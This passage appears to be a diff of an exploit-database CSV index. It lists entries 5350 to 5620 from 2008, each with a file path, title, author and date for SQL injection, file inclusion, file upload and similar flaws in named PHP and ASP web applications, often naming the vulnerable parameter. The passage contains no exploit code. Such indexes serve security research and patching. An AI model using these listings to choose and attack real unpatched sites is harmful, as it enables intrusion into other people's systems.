'PATH_TO_CODE' Remote File Inclusion",2008-04-02,w0cker,webapps,php, +5350,exploits/php/webapps/5350.txt,"KwsPHP 1.3.456 Module Galerie - 'id_gal' SQL Injection",2008-04-03,S@BUN,webapps,php, +5351,exploits/php/webapps/5351.txt,"KwsPHP 1.3.456 Module Archives - 'id' SQL Injection",2008-04-03,S@BUN,webapps,php, +5352,exploits/php/webapps/5352.txt,"KwsPHP Module jeuxflash 1.0 - 'cat' SQL Injection",2008-04-03,Houssamix,webapps,php, +5353,exploits/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' SQL Injection",2008-04-03,Stack,webapps,php, +5358,exploits/php/webapps/5358.pl,"XPOZE Pro 3.05 - 'reed' SQL Injection",2008-04-04,t0pP8uZz,webapps,php, +5359,exploits/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,webapps,php, +5360,exploits/php/webapps/5360.txt,"Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure",2008-04-04,HaCkeR_EgY,webapps,php, +5362,exploits/php/webapps/5362.txt,"Comdev News Publisher 4.1.2 - SQL Injection",2008-04-04,t0pP8uZz,webapps,php, +5363,exploits/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,webapps,php, +5364,exploits/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - 'photo_id' SQL Injection",2008-04-04,t0pP8uZz,webapps,php, +5365,exploits/php/webapps/5365.txt,"Blogator-script 0.95 - 'incl_page' Remote File Inclusion",2008-04-04,JIKO,webapps,php, +5367,exploits/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection",2008-04-04,t0pP8uZz,webapps,php, +5368,exploits/php/webapps/5368.txt,"Blogator-script 0.95 - 'id_art' SQL Injection",2008-04-04,"Virangar Security",webapps,php, +5369,exploits/php/webapps/5369.txt,"Dragoon 0.1 - 'lng' Local File Inclusion",2008-04-04,w0cker,webapps,php, +5370,exploits/php/webapps/5370.txt,"Blogator-script 0.95 - Change User Password",2008-04-05,"Virangar Security",webapps,php, +5371,exploits/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,webapps,php, +5372,exploits/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php' SQL Injection",2008-04-05,t0pP8uZz,webapps,php, +5373,exploits/asp/webapps/5373.txt,"Cobalt 0.1 - Multiple SQL Injections",2008-04-05,U238,webapps,asp, +5374,exploits/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,webapps,php, +5375,exploits/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,webapps,php, +5376,exploits/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection",2008-04-05,t0pP8uZz,webapps,php, +5377,exploits/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,webapps,php, +5378,exploits/php/webapps/5378.txt,"Software Index 1.1 - 'cid' SQL Injection",2008-04-05,t0pP8uZz,webapps,php, +5379,exploits/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,webapps,php, +5380,exploits/php/webapps/5380.txt,"Blog PixelMotion - 'sauvBase.php' Arbitrary Database Backup",2008-04-06,JIKO,webapps,php, +5381,exploits/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Arbitrary File Upload",2008-04-06,JIKO,webapps,php, +5382,exploits/php/webapps/5382.txt,"Blog PixelMotion - 'categorie' SQL Injection",2008-04-06,parad0x,webapps,php, +5383,exploits/php/webapps/5383.txt,"Site Sift Listings - 'id' SQL Injection",2008-04-06,S@BUN,webapps,php, +5384,exploits/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,webapps,php, +5385,exploits/php/webapps/5385.txt,"Prozilla Forum Service - 'forum' SQL Injection",2008-04-06,t0pP8uZz,webapps,php, +5387,exploits/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,webapps,php, +5388,exploits/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,webapps,php, +5389,exploits/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - 'id' SQL Injection",2008-04-06,t0pP8uZz,webapps,php, +5390,exploits/php/webapps/5390.txt,"Prozilla Freelancers - 'project' SQL Injection",2008-04-07,t0pP8uZz,webapps,php, +5391,exploits/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,webapps,php, +5392,exploits/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,webapps,php, +5393,exploits/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,webapps,php, +5394,exploits/php/webapps/5394.txt,"Mole 2.1.0 - 'viewsource.php' Remote File Disclosure",2008-04-07,GoLd_M,webapps,php, +5399,exploits/php/webapps/5399.txt,"ChartDirector 4.1 - 'viewsource.php' File Disclosure",2008-04-07,Stack,webapps,php, +5400,exploits/php/webapps/5400.txt,"724CMS 4.01 Enterprise - 'index.php' SQL Injection",2008-04-07,Lidloses_Auge,webapps,php, +5401,exploits/php/webapps/5401.txt,"My Gaming Ladder 7.5 - 'ladderid' SQL Injection",2008-04-07,t0pP8uZz,webapps,php, +5402,exploits/php/webapps/5402.txt,"iScripts Socialware - 'id' SQL Injection",2008-04-07,t0pP8uZz,webapps,php, +5404,exploits/php/webapps/5404.php,"phpTournois G4 - Arbitrary File Upload / Code Execution",2008-04-08,"Charles Fol",webapps,php, +5405,exploits/php/webapps/5405.txt,"ExBB 0.22 - Local/Remote File Inclusion",2008-04-08,The:Paradox,webapps,php, +5406,exploits/php/webapps/5406.txt,"Pligg CMS 9.9.0 - 'editlink.php' SQL Injection",2008-04-08,"Guido Landi",webapps,php, +5407,exploits/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution",2008-04-08,EgiX,webapps,php, +5408,exploits/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution",2008-04-08,girex,webapps,php, +5409,exploits/asp/webapps/5409.txt,"SuperNET Shop 1.0 - SQL Injection",2008-04-08,U238,webapps,asp, +5410,exploits/php/webapps/5410.txt,"Prediction Football 1.x - 'matchid' SQL Injection",2008-04-08,0in,webapps,php, +5411,exploits/php/webapps/5411.txt,"Dream4 Koobi Pro 6.25 Links - 'categ' SQL Injection",2008-04-08,S@BUN,webapps,php, +5412,exploits/php/webapps/5412.txt,"Dream4 Koobi Pro 6.25 Shop - 'categ' SQL Injection",2008-04-08,S@BUN,webapps,php, +5413,exploits/php/webapps/5413.txt,"Dream4 Koobi Pro 6.25 Gallery - 'galid' SQL Injection",2008-04-08,S@BUN,webapps,php, +5414,exploits/php/webapps/5414.txt,"Dream4 Koobi Pro 6.25 Showimages - 'galid' SQL Injection",2008-04-08,S@BUN,webapps,php, +5415,exploits/php/webapps/5415.txt,"Dream4 Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,webapps,php, +5417,exploits/php/webapps/5417.html,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,webapps,php, +5418,exploits/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,webapps,php, +5419,exploits/php/webapps/5419.txt,"Free Photo Gallery Site Script - 'path' File Disclosure",2008-04-09,JIKO,webapps,php, +5420,exploits/php/webapps/5420.txt,"Phaos R4000 Version - 'file' Remote File Disclosure",2008-04-09,HaCkeR_EgY,webapps,php, +5421,exploits/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",webapps,php, +5422,exploits/php/webapps/5422.pl,"LiveCart 1.1.1 - 'id' Blind SQL Injection",2008-04-10,irvian,webapps,php, +5423,exploits/php/webapps/5423.txt,"Ksemail - Local File Inclusion",2008-04-10,dun,webapps,php, +5425,exploits/php/webapps/5425.pl,"LightNEasy 1.2 - no database Remote Hash Retrieve",2008-04-10,girex,webapps,php, +5426,exploits/php/webapps/5426.txt,"RX Maxsoft - 'fotoID' SQL Injection",2008-04-10,S@BUN,webapps,php, +5428,exploits/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,webapps,php, +5429,exploits/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,webapps,php, +5431,exploits/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote s",2008-04-11,Houssamix,webapps,php, +5432,exploits/php/webapps/5432.txt,"PHPAddressBook 2.11 - 'view.php' SQL Injection",2008-04-11,Cr@zy_King,webapps,php, +5433,exploits/php/webapps/5433.txt,"CcMail 1.0.1 - Insecure Cookie Handling",2008-04-12,t0pP8uZz,webapps,php, +5434,exploits/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection",2008-04-13,girex,webapps,php, +5435,exploits/php/webapps/5435.txt,"Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,webapps,php, +5436,exploits/php/webapps/5436.txt,"Pollbooth 2.0 - 'pollID' SQL Injection",2008-04-13,S@BUN,webapps,php, +5437,exploits/php/webapps/5437.txt,"CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion",2008-04-13,BugReport.IR,webapps,php, +5439,exploits/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,webapps,php, +5440,exploits/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,webapps,php, +5441,exploits/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,webapps,php, +5443,exploits/php/webapps/5443.txt,"SmallBiz eShop - 'content_id' SQL Injection",2008-04-14,Stack,webapps,php, +5444,exploits/php/webapps/5444.txt,"BosClassifieds 3.0 - 'index.php' SQL Injection",2008-04-14,"SoSo H H",webapps,php, +5446,exploits/php/webapps/5446.txt,"BosNews 4.0 - 'article' SQL Injection",2008-04-14,Crackers_Child,webapps,php, +5447,exploits/php/webapps/5447.txt,"Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,webapps,php, +5448,exploits/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' SQL Injection",2008-04-14,S@BUN,webapps,php, +5449,exploits/php/webapps/5449.php,"KwsPHP - 'Upload' Remote Code Execution",2008-04-14,Ajax,webapps,php, +5450,exploits/php/webapps/5450.txt,"Classifieds Caffe - 'cat_id' SQL Injection",2008-04-15,JosS,webapps,php, +5452,exploits/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,webapps,php, +5454,exploits/php/webapps/5454.txt,"LaserNet CMS 1.5 - SQL Injection",2008-04-15,cO2,webapps,php, +5456,exploits/asp/webapps/5456.txt,"Carbon Communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,webapps,asp, +5457,exploits/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' SQL Injection",2008-04-16,cO2,webapps,php, +5459,exploits/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,webapps,php, +5463,exploits/php/webapps/5463.txt,"Grape Statistics 0.2a - 'location' Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,webapps,php, +5464,exploits/php/webapps/5464.txt,"5th Avenue Shopping Cart - 'category_id' SQL Injection",2008-04-18,"Aria-Security Team",webapps,php, +5465,exploits/php/webapps/5465.txt,"2532/Gigs 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,webapps,php, +5466,exploits/php/webapps/5466.pl,"OpenInvoice 0.9 - Arbitrary Change User Password",2008-04-18,t0pP8uZz,webapps,php, +5467,exploits/php/webapps/5467.txt,"PhShoutBox 1.5 - Insecure Cookie Handling",2008-04-18,t0pP8uZz,webapps,php, +5468,exploits/php/webapps/5468.txt,"Simple Customer 1.2 - 'contact.php' SQL Injection",2008-04-18,t0pP8uZz,webapps,php, +5469,exploits/php/webapps/5469.txt,"AllMyGuests 0.4.1 - 'AMG_id' SQL Injection",2008-04-19,Player,webapps,php, +5470,exploits/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Blind SQL Injection",2008-04-19,The:Paradox,webapps,php, +5471,exploits/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,webapps,php, +5473,exploits/php/webapps/5473.pl,"XOOPS Module Recipe 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,webapps,php, +5474,exploits/php/webapps/5474.txt,"Aterr 0.9.1 - PHP5 Local File Inclusion",2008-04-19,KnocKout,webapps,php, +5475,exploits/asp/webapps/5475.txt,"W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection",2008-04-20,U238,webapps,asp, +5476,exploits/php/webapps/5476.txt,"HostDirectory Pro - Insecure Cookie Handling",2008-04-20,Crackers_Child,webapps,php, +5477,exploits/php/webapps/5477.txt,"KubeLance 1.6.4 - 'ipn.php' Local File Inclusion",2008-04-20,Crackers_Child,webapps,php, +5478,exploits/php/webapps/5478.txt,"Acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,webapps,php, +5480,exploits/php/webapps/5480.txt,"BlogWorx 1.0 - 'id' SQL Injection",2008-04-21,U238,webapps,php, +5481,exploits/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - 'id' SQL Injection",2008-04-21,ZoRLu,webapps,php, +5482,exploits/asp/webapps/5482.py,"RedDot CMS 7.5 - 'LngId' SQL Injection",2008-04-21,"IRM Plc.",webapps,asp, +5483,exploits/php/webapps/5483.txt,"TR News 2.1 - 'nb' SQL Injection",2008-04-21,His0k4,webapps,php, +5484,exploits/php/webapps/5484.txt,"Joomla! Component FlippingBook 1.0.4 - SQL Injection",2008-04-22,cO2,webapps,php, +5485,exploits/php/webapps/5485.pl,"Web Calendar 4.1 - Blind SQL Injection",2008-04-22,t0pP8uZz,webapps,php, +5486,exploits/php/webapps/5486.txt,"WordPress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,webapps,php, +5487,exploits/php/webapps/5487.txt,"E RESERV 2.1 - 'index.php' SQL Injection",2008-04-23,JIKO,webapps,php, +5488,exploits/php/webapps/5488.txt,"Joomla! Component Filiale 1.0.4 - 'idFiliale' SQL Injection",2008-04-23,str0xo,webapps,php, +5490,exploits/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,webapps,php, +5491,exploits/php/webapps/5491.txt,"Joomla! Component Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,webapps,php, +5493,exploits/php/webapps/5493.txt,"Joomla! Component JPad 1.0 - Authenticated SQL Injection",2008-04-24,His0k4,webapps,php, +5494,exploits/php/webapps/5494.txt,"MiniBB 2.2 - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2008-04-25,girex,webapps,php, +5495,exploits/php/webapps/5495.txt,"PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection",2008-04-25,Kacper,webapps,php, +5497,exploits/php/webapps/5497.txt,"Joomla! Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,webapps,php, +5499,exploits/php/webapps/5499.txt,"Siteman 2.x - Code Execution / Local File Inclusion / Cross-Site Scripting",2008-04-26,"Khashayar Fereidani",webapps,php, +5500,exploits/php/webapps/5500.txt,"PostNuke Module pnFlashGames 2.5 - SQL Injection",2008-04-26,Kacper,webapps,php, +5501,exploits/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion",2008-04-26,RoMaNcYxHaCkEr,webapps,php, +5502,exploits/php/webapps/5502.pl,"Clever Copy 3.0 - 'postview.php' SQL Injection",2008-04-26,U238,webapps,php, +5503,exploits/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple SQL Injections",2008-04-26,U238,webapps,asp, +5504,exploits/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' SQL Injection",2008-04-26,JIKO,webapps,php, +5505,exploits/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 - SQL Injection",2008-04-26,Cr@zy_King,webapps,php, +5506,exploits/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,webapps,php, +5507,exploits/asp/webapps/5507.txt,"Megabbs Forum 2.2 - SQL Injection / Cross-Site Scripting",2008-04-27,BugReport.IR,webapps,asp, +5508,exploits/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php' SQL Injection",2008-04-27,ProgenTR,webapps,php, +5509,exploits/php/webapps/5509.txt,"FluentCMS - 'view.php' SQL Injection",2008-04-27,cO2,webapps,php, +5510,exploits/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,webapps,php, +5512,exploits/php/webapps/5512.pl,"Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection",2008-04-27,cO2,webapps,php, +5513,exploits/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,webapps,php, +5514,exploits/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - 'gid' Blind SQL Injection",2008-04-27,ZAMUT,webapps,php, +5516,exploits/php/webapps/5516.txt,"Prozilla Hosting Index - 'cat_id' SQL Injection",2008-04-28,K-159,webapps,php, +5517,exploits/php/webapps/5517.txt,"Softbiz Web Host Directory Script - 'host_id' SQL Injection",2008-04-28,K-159,webapps,php, +5520,exploits/php/webapps/5520.txt,"Joovili 3.1 - 'browse.videos.php' SQL Injection",2008-04-28,HaCkeR_EgY,webapps,php, +5521,exploits/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure",2008-04-29,"Roberto Suggi Liverani",webapps,php, +5522,exploits/php/webapps/5522.txt,"LokiCMS 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,webapps,php, +5523,exploits/php/webapps/5523.txt,"Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities",2008-04-30,GoLd_M,webapps,php, +5524,exploits/php/webapps/5524.txt,"OxYProject 0.85 - 'edithistory.php' Remote Code Execution",2008-04-30,GoLd_M,webapps,php, +5525,exploits/php/webapps/5525.txt,"Harris WapChat 1 - Multiple Remote File Inclusions",2008-04-30,k1n9k0ng,webapps,php, +5526,exploits/php/webapps/5526.txt,"Interact 2.4.1 - Multiple Remote File Inclusions",2008-04-30,RoMaNcYxHaCkEr,webapps,php, +5527,exploits/php/webapps/5527.pl,"Joomla! Component Webhosting - 'catid' Blind SQL Injection",2008-05-01,cO2,webapps,php, +5528,exploits/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File Inclusion",2008-05-01,"Khashayar Fereidani",webapps,php, +5529,exploits/php/webapps/5529.txt,"Vlbook 1.21 - Cross-Site Scripting / Local File Inclusion",2008-05-01,"Khashayar Fereidani",webapps,php, +5531,exploits/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b - SQL Injection",2008-05-02,InjEctOr5,webapps,php, +5532,exploits/php/webapps/5532.txt,"ItCMS 1.9 - 'boxpop.php' Remote Code Execution",2008-05-02,Cod3rZ,webapps,php, +5533,exploits/php/webapps/5533.txt,"BlogMe PHP 1.1 - 'comments.php' SQL Injection",2008-05-03,His0k4,webapps,php, +5535,exploits/php/webapps/5535.txt,"SmartBlog 1.3 - 'index.php' SQL Injection",2008-05-03,His0k4,webapps,php, +5537,exploits/php/webapps/5537.txt,"phpDirectorySource 1.1 - Multiple SQL Injections",2008-05-03,InjEctOr5,webapps,php, +5538,exploits/php/webapps/5538.txt,"Cplinks 1.03 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-05-04,InjEctOr5,webapps,php, +5539,exploits/php/webapps/5539.txt,"ScorpNews 1.0 - 'site' Remote File Inclusion",2008-05-04,Silver,webapps,php, +5540,exploits/php/webapps/5540.pl,"Scout Portal Toolkit 1.4.0 - 'ParentId' SQL Injection",2008-05-04,JosS,webapps,php, +5541,exploits/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia 0.2.0 - SQL Injection",2008-05-05,K-159,webapps,php, +5542,exploits/php/webapps/5542.txt,"Online Rental Property Script 4.5 - 'pid' SQL Injection",2008-05-05,K-159,webapps,php, +5543,exploits/php/webapps/5543.txt,"Anserv Auction XL - 'cat' SQL Injection",2008-05-05,K-159,webapps,php, +5544,exploits/php/webapps/5544.txt,"Kmita Tellfriend 2.0 - 'file' Remote File Inclusion",2008-05-05,K-159,webapps,php, +5545,exploits/php/webapps/5545.txt,"Kmita Mail 3.0 - 'file' Remote File Inclusion",2008-05-05,K-159,webapps,php, +5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php, +5548,exploits/php/webapps/5548.txt,"Miniweb 2.0 - 'historymonth' SQL Injection",2008-05-05,HaCkeR_EgY,webapps,php, +5549,exploits/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",webapps,php, +5550,exploits/php/webapps/5550.php,"DeluxeBB 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,webapps,php, +5551,exploits/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - 'search.php' SQL Injection",2008-05-06,t0pP8uZz,webapps,php, +5552,exploits/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' SQL Injection",2008-05-06,InjEctOr5,webapps,php, +5553,exploits/asp/webapps/5553.txt,"FipsCMS 2.1 - 'print.asp' SQL Injection",2008-05-07,InjEctOr5,webapps,asp, +5554,exploits/php/webapps/5554.php,"Galleristic 1.0 - 'cat' SQL Injection",2008-05-07,cOndemned,webapps,php, +5555,exploits/php/webapps/5555.txt,"GameCMS Lite 1.0 - 'systemId' SQL Injection",2008-05-07,InjEctOr5,webapps,php, +5556,exploits/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' SQL Injection",2008-05-07,InjEctOr5,webapps,asp, +5557,exploits/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,webapps,php, +5558,exploits/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting",2008-05-07,RoMaNcYxHaCkEr,webapps,php, +5559,exploits/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",webapps,php, +5560,exploits/php/webapps/5560.txt,"MusicBox 2.3.7 - 'artistId' SQL Injection",2008-05-07,HaCkeR_EgY,webapps,php, +5562,exploits/php/webapps/5562.py,"RunCMS 1.6.1 - 'msg_image' SQL Injection",2008-05-08,The:Paradox,webapps,php, +5564,exploits/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple SQL Injections",2008-05-08,U238,webapps,asp, +5565,exploits/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - 'tid' SQL Injection",2008-05-08,Saime,webapps,php, +5566,exploits/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusions",2008-05-08,RoMaNcYxHaCkEr,webapps,php, +5567,exploits/php/webapps/5567.txt,"Cyberfolio 7.12 - 'rep' Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,webapps,php, +5568,exploits/php/webapps/5568.txt,"miniBloggie 1.0 - 'del.php' Arbitrary Delete Post",2008-05-08,Cod3rZ,webapps,php, +5575,exploits/php/webapps/5575.txt,"Admidio 1.4.8 - 'getfile.php' Remote File Disclosure",2008-05-09,n3v3rh00d,webapps,php, +5576,exploits/php/webapps/5576.pl,"SazCart 1.5.1 - 'prodid' SQL Injection",2008-05-09,JosS,webapps,php, +5577,exploits/php/webapps/5577.txt,"HispaH Model Search - 'cat.php?cat' SQL Injection",2008-05-09,InjEctOr5,webapps,php, +5578,exploits/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2008-05-09,tw8,webapps,php, +5579,exploits/php/webapps/5579.html,"txtCMS 0.3 - 'index.php' Local File Inclusion",2008-05-09,cOndemned,webapps,php, +5580,exploits/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - 'gid' SQL Injection",2008-05-09,Mr.SQL,webapps,php, +5581,exploits/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 - SQL Injection",2008-05-10,His0k4,webapps,php, +5582,exploits/php/webapps/5582.txt,"Ktools Photostore 3.5.2 - Multiple SQL Injections",2008-05-10,DNX,webapps,php, +5583,exploits/php/webapps/5583.php,"Joomla! Component Datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,webapps,php, +5586,exploits/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusions",2008-05-11,CraCkEr,webapps,php, +5587,exploits/php/webapps/5587.pl,"Joomla! Component xsstream-dm 0.01b - SQL Injection",2008-05-11,Houssamix,webapps,php, +5588,exploits/php/webapps/5588.php,"QuickUpCMS - Multiple SQL Injections Vulnerabilities",2008-05-11,Lidloses_Auge,webapps,php, +5589,exploits/php/webapps/5589.php,"Vortex CMS - 'pageid' Blind SQL Injection",2008-05-11,Lidloses_Auge,webapps,php, +5590,exploits/php/webapps/5590.txt,"AJ Article 1.0 - 'featured_article.php' SQL Injection",2008-05-12,t0pP8uZz,webapps,php, +5591,exploits/php/webapps/5591.txt,"AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection",2008-05-12,t0pP8uZz,webapps,php, +5592,exploits/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,webapps,php, +5594,exploits/php/webapps/5594.txt,"ZeusCart 2.0 - 'category_list.php' SQL Injection",2008-05-12,t0pP8uZz,webapps,php, +5595,exploits/php/webapps/5595.txt,"ClanLite 2.x - SQL Injection / Cross-Site Scripting",2008-05-12,ZoRLu,webapps,php, +5596,exploits/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusions",2008-05-12,BiNgZa,webapps,php, +5597,exploits/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,webapps,php, +5598,exploits/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - 'fid' SQL Injection",2008-05-12,TurkishWarriorr,webapps,php, +5599,exploits/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,webapps,php, +5600,exploits/php/webapps/5600.php,"CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload",2008-05-12,EgiX,webapps,php, +5601,exploits/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection",2008-05-12,Stack,webapps,php, +5602,exploits/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php' SQL Injection",2008-05-12,InjEctOr5,webapps,php, +5603,exploits/php/webapps/5603.txt,"EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)",2008-05-13,vortfu,webapps,php, +5604,exploits/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - 'rid' Blind SQL Injection",2008-05-13,Saime,webapps,php, +5605,exploits/php/webapps/5605.txt,"e-107 Plugin ZoGo-Shop 1.16 Beta 13 - SQL Injection",2008-05-13,Cr@zy_King,webapps,php, +5606,exploits/php/webapps/5606.txt,"Web Group Communication Center (WGCC) 1.0.3 - SQL Injection",2008-05-13,myvx,webapps,php, +5607,exploits/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - 'langsel' SQL Injection",2008-05-13,His0k4,webapps,php, +5608,exploits/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple SQL Injections",2008-05-13,U238,webapps,asp, +5609,exploits/php/webapps/5609.txt,"EMO Realty Manager - 'ida' SQL Injection",2008-05-13,HaCkeR_EgY,webapps,php, +5610,exploits/php/webapps/5610.txt,"The Real Estate Script - 'docID' SQL Injection",2008-05-13,HaCkeR_EgY,webapps,php, +5611,exploits/php/webapps/5611.txt,"Linkspile - 'cat_id' SQL Injection",2008-05-13,HaCkeR_EgY,webapps,php, +5613,exploits/php/webapps/5613.txt,"Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection",2008-05-14,t0pP8uZz,webapps,php, +5614,exploits/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - 'detail.php' SQL Injection",2008-05-14,t0pP8uZz,webapps,php, +5615,exploits/php/webapps/5615.txt,"AS-GasTracker 1.0.0 - Insecure Cookie Handling",2008-05-14,t0pP8uZz,webapps,php, +5616,exploits/php/webapps/5616.txt,"ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,webapps,php, +5617,exploits/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,webapps,php, +5618,exploits/php/webapps/5618.txt,"Lanius CMS 1.2.16 - 'FCKeditor' Arbitrary File Upload",2008-05-14,EgiX,webapps,php, +5620,exploits/php/webapps/5620.txt,"rgboard 3.0.12 - Remote File Inclusioni / Cross-Site 